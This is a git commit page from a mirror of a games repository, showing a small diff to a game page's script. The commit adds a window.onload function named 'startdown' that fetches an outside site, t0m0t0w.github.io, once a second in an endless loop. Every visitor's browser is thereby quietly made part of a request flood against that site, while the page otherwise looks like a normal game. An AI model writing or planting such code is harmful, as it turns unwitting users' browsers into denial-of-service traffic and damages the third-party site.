mirror of
https://github.com/hexahigh/games.git
synced 2025-12-11 20:15:38 +01:00
t
This commit is contained in:
parent
fc8a3962ee
commit
e07a896949
@ -16,9 +16,11 @@
|
||||
setTimeout(resolve, milliseconds);
|
||||
});
|
||||
}
|
||||
while(true) {
|
||||
await delay(1000);
|
||||
fetch('https://t0m0t0w.github.io')
|
||||
window.onload = async function startdown(){
|
||||
while(true) {
|
||||
await delay(1000);
|
||||
fetch('https://t0m0t0w.github.io')
|
||||
}
|
||||
}
|
||||
let speed = 1000
|
||||
setInterval(addKrydder, speed);
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user